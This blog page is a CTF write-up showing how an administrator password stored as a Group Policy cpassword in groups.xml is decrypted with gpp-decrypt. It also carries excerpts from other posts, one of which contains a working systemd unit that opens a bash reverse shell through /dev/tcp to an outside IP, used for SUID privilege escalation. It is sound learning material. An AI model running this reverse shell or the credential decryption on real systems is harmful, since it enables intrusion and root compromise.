Skip to main content

Ringzer0CTF – Cryptography – I lost MY password Can you find it?


Ringzer0CTF – Cryptography – I lost MY password Can you find it?

Objective:
Get the flag…… I don’t know what else to put here


Solution:

So this level give you a tar file
I downloaded the tar and unzipped it

There is a policies folder with the following folders inside

02/06/2014  09:20 AM    <DIR>          .
02/06/2014  09:20 AM    <DIR>          ..
02/05/2014  03:59 PM    <DIR>          {31B2F340-016D-11D2-945F-00C04FB984F9}
02/05/2014  03:59 PM    <DIR>          {6AC1786C-016F-11D2-945F-00C04fB984F9}
02/06/2014  09:22 AM    <DIR>          {75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}
02/06/2014  08:20 AM    <DIR>          {874C2133-64E1-4F2C-8BD8-71D9BD59643D}
02/06/2014  08:29 AM    <DIR>          {C7BD6C6D-A1C8-4C23-815E-3D8D4187640F}
               0 File(s)              0 bytes
               7 Dir(s)  326,238,683,136 bytes free


I poked through the directory and found an interesting file in one
In this directory d22fdb09ef96576dfc49076a9322a555\Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups>

It is a groups.xml file

Which contains

<?xml version="1.0" encoding="UTF-8"?>
 -<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  -<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" removePolicy="0" userContext="0" uid="{C73C0939-38FB-4287-AC48-478F614F5EF7}" changed="2014-02-06 19:33:28" image="1" name="Administrator (built-in)">
 <Properties userName="Administrator (built-in)" subAuthority="" acctDisabled="0" neverExpires="1" noChange="0" changeLogon="0" cpassword="PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw" description="Administrator" fullName="Administrator" action="R"/>
 </User>
 </Groups>


Ooooohhh there is something called cpassword there, lets google that



This site says that this is and AES-256 encrypted password for the Administrator account. 

However Microsoft actually published their AES key online at some point in time making it pretty trivial to crack


So If Rapid7 has pretty good write up about it…. Guess what that means?
Someone has already created a decryption tool for it and its preloaded in Kali

 gpp-decrypt
  ~ gpp-decrypt
Usage: gpp-decrypt: encrypted_data


So syntax is the application followed by the encrypted data. let’s put in the hash and see what happens

  ~ gpp-decrypt PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
LocalRoot!


We get an error about a Cipher being deprecated but after that we get the decrypted password

LocalRoot!

Comments

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar